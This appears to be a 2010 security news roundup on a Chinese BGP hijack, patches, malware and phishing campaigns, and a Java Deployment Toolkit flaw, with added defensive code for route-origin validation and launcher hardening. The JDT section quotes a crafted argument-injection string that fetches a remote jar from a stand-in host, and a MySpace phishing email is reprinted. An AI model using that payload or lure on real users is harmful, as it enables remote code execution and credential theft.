NEWS - April 09, 2010

Chinese ISP hijacks the Internet, momentarily

"Dell, Apple, Starbucks and CNN web traffic was redirected to China"

For the second time in two weeks, bad networking information spreading from China has disrupted the Internet.

On Thursday morning, bad routing data from a small Chinese ISP called IDC China Telecommunication was re-transmitted by China's state-owned China Telecommunications, and then spread around the Internet, affecting Internet service providers such as AT&T, Level3, Deutsche Telekom, Qwest Communications and Telefonica.

"There are a large number of ISPs who accepted these routes all over the world," said Martin A. Brown, technical lead at Internet monitoring firm Renesys.

According to Brown, the incident started just before 10am Eastern Time on Thursday and lasted about 20 minutes. During that time IDC China Telecommunication transmitted bad routing information for between 32,000 and 37,000 networks, redirecting them to IDC China Telecommunication instead of their rightful owners.

These networks included about 8,000 US networks, including those operated by Dell, CNN, Starbucks and Apple. More than 8,500 Chinese networks, 1,100 in Australia and 230 owned by France Telecom were also affected.

Continued here: http://news.techworld.com/networking/3219752/chinese-isp-hijacks-the-internet-momentarily/
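The incident above is an origin hijack: one network announced prefixes it does not own and enough neighbours accepted the announcements. The block below is an added example, not part of the Techworld article or the forum post, showing the check that catches this pattern: route origin validation of each announcement against a list of authorised (prefix, maximum length, origin AS) records, the data that RPKI ROAs carry. All prefixes, AS numbers and the announcement feed are constructed sample data, not routes from the April 2010 event.

```python
import ipaddress
from typing import List, Tuple

# Each record says: prefixes inside `prefix`, no longer than `max_length`,
# may be originated by `origin_as`. Constructed sample data, ROA-style.
ROAS = [
    ("203.0.113.0/24", 24, 64500),
    ("198.51.100.0/22", 24, 64501),
    ("2001:db8::/32", 48, 64502),
]

VALID, INVALID, NOT_FOUND = "valid", "invalid", "not-found"


def _covering(ann_net, roa_net) -> bool:
    """True when roa_net contains ann_net (same address family only)."""
    return ann_net.version == roa_net.version and ann_net.subnet_of(roa_net)


def validate(prefix: str, origin_as: int, roas=ROAS) -> Tuple[str, str]:
    """Origin validation for a single announcement.

    Returns (state, reason). Mirrors RPKI ROV semantics: VALID if some covering
    record authorises this origin AS at this prefix length; INVALID if covering
    records exist but none matches; NOT_FOUND if nothing covers the prefix.
    """
    ann = ipaddress.ip_network(prefix, strict=True)
    covering = [
        (ipaddress.ip_network(p), ml, asn)
        for p, ml, asn in roas
        if _covering(ann, ipaddress.ip_network(p))
    ]
    if not covering:
        return NOT_FOUND, "no covering record"
    origin_ok = [r for r in covering if r[2] == origin_as]
    if any(ann.prefixlen <= ml for _, ml, _ in origin_ok):
        return VALID, "authorised origin"
    if origin_ok:
        # Right AS, but more specific than allowed: this is what a sub-prefix
        # hijack looks like, even when the origin AS itself is legitimate.
        longest = max(ml for _, ml, _ in origin_ok)
        return INVALID, f"/{ann.prefixlen} exceeds max_length {longest}"
    expected = sorted({asn for _, _, asn in covering})
    return INVALID, f"origin AS{origin_as} not authorised; expected {expected}"


def find_hijacks(announcements, roas=ROAS) -> List[Tuple[str, int, str]]:
    """Return (prefix, origin_as, reason) for every INVALID announcement.

    Run over a route feed, this surfaces the pattern in the article: many
    prefixes suddenly announced with an origin AS that does not own them.
    """
    flagged = []
    for prefix, origin in announcements:
        state, reason = validate(prefix, origin, roas)
        if state == INVALID:
            flagged.append((prefix, origin, reason))
    return flagged


# Constructed sample feed: (announced prefix, origin AS).
SAMPLE_FEED = [
    ("203.0.113.0/24", 64500),     # rightful owner
    ("203.0.113.0/24", 64999),     # same prefix, foreign origin: origin hijack
    ("198.51.100.0/24", 64501),    # more specific than the record, within max_length
    ("198.51.100.128/25", 64501),  # too specific even for the owner
    ("198.51.100.0/23", 64999),    # foreign origin inside a covered block
    ("192.0.2.0/24", 64999),       # no record: cannot be judged from origin data
    ("2001:db8:1::/48", 64502),    # IPv6, authorised
    ("2001:db8:1::/48", 64999),    # IPv6, hijacked
]

if __name__ == "__main__":
    for prefix, origin, reason in find_hijacks(SAMPLE_FEED):
        print(f"INVALID {prefix:20} AS{origin}: {reason}")
```

Running the block flags four announcements. The caveat a practitioner should keep in mind: origin validation only catches announcements that change the origin AS or announce an unauthorised more-specific. A forged AS path that still ends in the legitimate origin passes this check and needs path-level monitoring, and prefixes with no record come back not-found rather than invalid.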
- Collapse -
Microsoft finally to close the VBScript hole in IE

"Microsoft finally to close the VBScript hole in Internet Explorer "

Next Tuesday, Microsoft plans to release eleven updates to close 25 security holes, including the VBScript hole in Internet Explorer that has been known for about six weeks and the DoS vulnerability in the SMB client of Windows 7 and Server 2008 disclosed in November 2009.

The updates will also fix other holes in Windows (2000 to Server 2008), Office (Publisher and Visio) and in Exchange Server (2000 to 2010). Microsoft has given top priority to five of the eleven updates because they close critical holes.

The Internet Explorer hole which involves the processing of certain UNC paths and has been known since January appears to remain unpatched. It mainly affects pre-Vista systems; on Vista and Windows 7, Internet Explorer (7 and 8) runs in protected mode, which prevents attackers from exploiting the hole.

Microsoft has also pointed out that the support of several Windows versions will be discontinued this year. No further updates for Windows 2000 will be released from the 13th of July, 2010. Windows XP Service Pack 2 will only be supported until the 13th of July, 2010. It is therefore advisable to update to SP3. Windows Vista RTM will only be supported until the 13th of April, 2010, while the support of Vista SP1 will continue until the 12th of July, 2011.

Here: http://www.h-online.com/security/news/item/Microsoft-finally-to-close-the-VBScript-hole-in-Internet-Explorer-973954.html

- Collapse -
Tiger Woods (Searches) Not to Be Trusted

From the Threat Center Live Blog:

Tiger Woods' personal life and marital affairs have attracted constant attention from the press and have certainly damaged his public reputation. With his return to the Masters only days away, Nike has released a new commercial in an effort to rebuild Woods' image. This compelling commercial is intended to spark a reaction, and may well be the next thing you talk about at the office water cooler. Anyone who hasn't seen it will go right back to their desk and search for the video. Blackhats have once again worked their way into these search results, leading users to malicious sites and Rogue Anti-Virus downloads.

A user looking to see the commercial online would likely search "tiger woods commercial"; the search is heavily poisoned. Out of the top 7 search results, six lead to Fake Anti-Virus pages begging the user to install malicious software. The video results have also been poisoned to do the same. [...]

Continued here: http://threatcenter.blogspot.com/2010/04/tiger-woods-searches-not-to-be-trusted.html

- Collapse -
This PC Will Self-Destruct in Ten Seconds

From the Webroot Threat Blog:

Phishing Trojans that try to remain below the radar are still prevalent, but a number of files coming through Threat Research point to a disturbing trend: Several new variants of existing malware families are taking a scorched earth approach to infected computers, rendering the PC unbootable (just check out the batch file at left for just one egregious example) once the malware has retrieved whatever data it's trying to steal, or deliberately crashing it, repeatedly, if you try to remove it.

Since the middle of last year, we've seen a sprinkling of malware that also wipes out key files on the hard drive, sometimes preventing a reboot, after an infection. This isn't hostageware, which overtly threatens to delete the contents of the hard drive if you don't pay up, but something more sinister.

In some cases, the crashes we saw were the result of poor coding by the malware author. But increasingly it appears that this behavior is deliberate, and occurs without warning. And this unfortunate trend appears to be getting worse, leaving a raft of perplexed, angry victims unable to use their computers in the wake of an infection.

The commands within malware capable of rendering infected machines inoperable were first documented in detail last year. But recent files added to at least two of our definitions, Trojan-Downloader-Tacticlol and Trojan-Backdoor-Zbot, indicate that someone has begun to use this functionality.

Continued here: http://blog.webroot.com/2010/04/08/this-pc-will-self-destruct-in-ten-seconds/

- Collapse -
Trojanised Mobile Phone Game Makes Expensive Phone Calls

From the F-Secure Weblog:

We have received reports of a malicious Windows Mobile game that creates significant phone bills to affected users.

The game in question is called 3D Anti-terrorist action, and it's manufactured by Beijing Huike Technology in China. [...]

The game itself is a 3D first-person shooter. [...]

Apparently some Russian malware author took the game and trojanized it. Then he uploaded the trojanized version to several Windows Mobile freeware download sites.

Quite quickly people started reporting that the phone was making expensive calls on its own.

Here's an example of a thread on the XDA-Developers forum: [...]

Continued here: http://www.f-secure.com/weblog/archives/00001930.html

Also See: The mobile game with a Trojan thrown in for free

- Collapse -
Beware MySpace Password Reset Confirmation malware attack

From Graham Cluley's Blog:

Malicious hackers are spamming out messages claiming to come from MySpace's support team, informing unsuspecting users that as a "safety" measure their password has been changed.

Of course, the emails aren't really from support@myspace.com, and users who open the attached file risk infecting their computer with malware. [...]

A typical email looks like the following:

Subject: Myspace Password Reset Confirmation! Your Support
Attached file: password.zip
Message body:

Hey <name1@example.com>,
<name2@example.com>,
<name3@example.com>,
<name4@example.com>,

Because of the measures taken to provide safety to our clients, your password has been changed. You can find your new password in attached document.

Thanks,
The Myspace Team.


Continued here: http://www.sophos.com/blogs/gc/g/2010/04/09/beware-myspace-password-reset-confirmation-malware-attack/

- Collapse -
Identity Thieves Filed for $4 Million in Tax Refunds Using Names of Living and Dead

A group of sophisticated identity thieves managed to steal millions of dollars by filing bogus tax returns using the names and Social Security numbers of other people, many of them deceased, according to a 74-count indictment unsealed in Arizona Thursday.

The thieves operated their scheme for at least three years from January 2005 to April 2008, allegedly filing more than 1,900 fraudulent tax returns involving about $4 million in refunds directed to more than 170 bank accounts. The conspirators used numerous fake IDs to open internet and phone accounts, and also used more than 175 different IP addresses around the United States to file the fake returns, which were often filed in bulk as if through an automated process.

According to authorities a Californian, 29-year-old self-described hacker named Daniel David Rigmaiden, aka Steven Travis Brawner, was the ringleader of the group. He conspired with Ransom Marion Carter, III, 43 of Arizona and at least one other conspirator who was arrested in Utah in 2008 but has not been identified in court records.

Continued here: http://www.wired.com/threatlevel/2010/04/fake-tax-returns/

- Collapse -
New healthcare IT compliance service protects electronic medical records

I've been seeing the same general practice doctor for about 15 years. The last time I saw him, I noticed he carried a tablet PC instead of the usual thick paper-based folder full of my medical records. I commented on the switch to electronic medical records (EMR) and he said, "I was a holdout but my staff forced me into it."

He's not the only doctor to be toting a tablet PC instead of a plain old tablet of paper. The Congressional Budget Office forecasts that 90 percent of doctors and 70 percent of hospitals will be using comprehensive EMR within the next decade. Government stimulus incentives as high as $44,000 per physician are encouraging medical practitioners to adopt EMR technology. The hope is that electronic records will reduce healthcare costs as well as medical errors.

The movement toward electronic health records is both encouraging and frightening. On the plus side, I like that my digital health records can easily be shared with other physicians should the need arise. In an emergency, I'd want my attending physician to know as much about me as possible without having to wait for a copy of paper records.

On the down side, however, I'm concerned about the possibility of a data breach. Apparently this concern is warranted. According to market research firm Javelin Strategy & Research, data theft and other fraudulent activities related to the exposure of EMR data more than doubled in 2009. There were more than 275,000 cases of theft of medical information in the United States in 2009. Javelin expects that incidents of fraud will continue to increase as more medical providers increase their use of EMR.

http://www.networkworld.com/newsletters/techexec/2010/041210bestpractices.html

- Collapse -
The botnet economy

It is somewhat difficult for us - the potential victims - to appreciate the effectiveness of the various botnets and to acknowledge that the botnet masters have managed to work together beautifully.

Loucif Kharouni, a threat analyst with TrendLabs, decided to enlighten us and give us an overview of the spreading and the (inter)operating mechanisms of the major botnets: [...]

The tagged figures are the botnets. Going from left to right, the turquoise ones are primary, the red - secondary, and FakeAV (in blue) is tertiary. The different arrow colors represent the methods of threat delivery: green is for spam, and purple stands for "pay per install".

That means that Cutwail uses email spam to spread malicious files related to Sasfis, ZeuS and FakeAV, and that Bredo downloads variants of all the other botnets.

What does that mean for us? It means that if you find, for example, Bredo (which is a downloader) on your system, it is probable that at least two types of malware have been installed, and it's even possible that ALL the other malware is present on your system.

What does that mean for the botnet masters? It means that everyone has their function and their source of income - their place in this malicious ecosystem.

Continued here: http://www.net-security.org/secworld.php?id=9121

- Collapse -
Java (JDT) exploit launches local Windows applications

Tavis Ormandy has discovered a security vulnerability in the Java Deployment Toolkit (JDT) which can be exploited to launch arbitrary applications on a Windows system using a crafted website. The vulnerability could, for example, be used to download and run a trojan via FTP. JDT has been installed as part of Java since Java 6 Update 10. It is intended to make it easier for developers to distribute applications. According to Ormandy, the problem is the result of insufficient filtering of URLs, allowing arbitrary parameters to be fed to Java Web Start (JWS). JWS is able to download external Java applications using the Java Network Launching Protocol (JNLP) and run them in the VM.

By feeding crafted URLs (e.g. http: -J-jar -J\\\\www.example.com\\exploit.jar none) to the launch function, it is possible to download additional Java code and cause the Java VM to launch local applications with the user's privileges. Ormandy has published a demo exploit which downloads the file calc.jar, which launches the calculator from the command line.

In a quick test carried out by the heise Security editorial team, on a system running Windows XP, Java 6 Update 16 and Internet Explorer 8, it did indeed launch the calculator. On a Windows 7 system with IE 8, however, the Java VM merely displayed an error message. The exploit is also reported to work with Firefox (under Windows), but failed to do so in our tests.

Ormandy says he has informed Sun (now Oracle) of the problem. According to his report, Sun did not consider the vulnerability to be sufficiently critical to release an emergency patch outside of its three-month patch cycle. Until an update is released, Ormandy is advising users to set the kill bit for the JDT ActiveX control. This can either be performed manually, as described by Microsoft, or rather more simply using the AxBan tool. The CLSID for the control is CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. For Firefox, restricting access to npdeploytk.dll should block the exploit.

From: http://www.h-online.com/security/news/item/Java-exploit-launches-local-Windows-applications-974652.html

More details in Tavis Ormandy's security advisory: Java Deployment Toolkit Performs Insufficient Validation of Parameters.
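The bug Ormandy describes is argument injection: the string given to the control's launch function reached the javaws command line unvalidated, and because a command line is tokenised on whitespace before the program sees it, a "URL" containing spaces and -J options turned into arguments for the JVM. The block below is an added illustration, not Sun's code and not the published exploit: it models that flawed argument handling beside a hardened launcher that validates the target and hands it over as a single argv element. The function names, the javaws install path and the legitimate JNLP URL are assumptions; the crafted string is the one quoted in the article, and nothing is executed.

```python
from typing import List
from urllib.parse import urlsplit

# Assumed install path of the Java Web Start launcher; used only to build argv.
JAVAWS = r"C:\Program Files\Java\jre6\bin\javaws.exe"

# The crafted launch string quoted in the article, and a constructed
# legitimate JNLP URL for comparison.
CRAFTED = r"http: -J-jar -J\\\\www.example.com\\exploit.jar none"
LEGIT = "http://www.example.com/app.jnlp"


def vulnerable_launch_argv(url: str) -> List[str]:
    """Model of the flawed behaviour.

    The caller's string is appended to the javaws command line. The command
    line is tokenised on whitespace, so each space-separated piece of the
    'URL' becomes its own argument, and javaws treats -J<opt> arguments as
    options for the JVM it starts. Only the URL was meant to be one argument.
    """
    return [JAVAWS] + url.split()   # whitespace tokenisation: the root cause


def smuggled_options(argv: List[str]) -> List[str]:
    """JVM options that arrived through the 'URL'; should always be empty."""
    return [a for a in argv[1:] if a.startswith("-J")]


def safe_launch_argv(url: str) -> List[str]:
    """Hardened launcher: validate first, then pass exactly one argument.

    Rejects anything that looks like an option, any whitespace (which would be
    re-tokenised), and anything that is not an absolute http(s) URL with a
    host. Returning a list is deliberate: run it with subprocess.Popen(argv)
    and no shell so the URL can never be split a second time.
    """
    if not url or url.startswith("-"):
        raise ValueError("launch target may not start with '-'")
    if any(ch.isspace() for ch in url):
        raise ValueError("launch target must be a single URL with no whitespace")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"unsupported or malformed launch URL: {url!r}")
    return [JAVAWS, url]


def is_rejected(url: str) -> bool:
    """True when the hardened launcher refuses the target."""
    try:
        safe_launch_argv(url)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    argv = vulnerable_launch_argv(CRAFTED)
    print("vulnerable argv:", argv)
    print("smuggled JVM options:", smuggled_options(argv))
    print("hardened argv:", safe_launch_argv(LEGIT))
    print("hardened launcher rejects crafted input:", is_rejected(CRAFTED))
```

The validation runs on the string the page hands over, not on what the JVM later does with it, which is the only place this class of bug can be stopped: once the launcher has split the string, the -J options are indistinguishable from ones the user typed.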
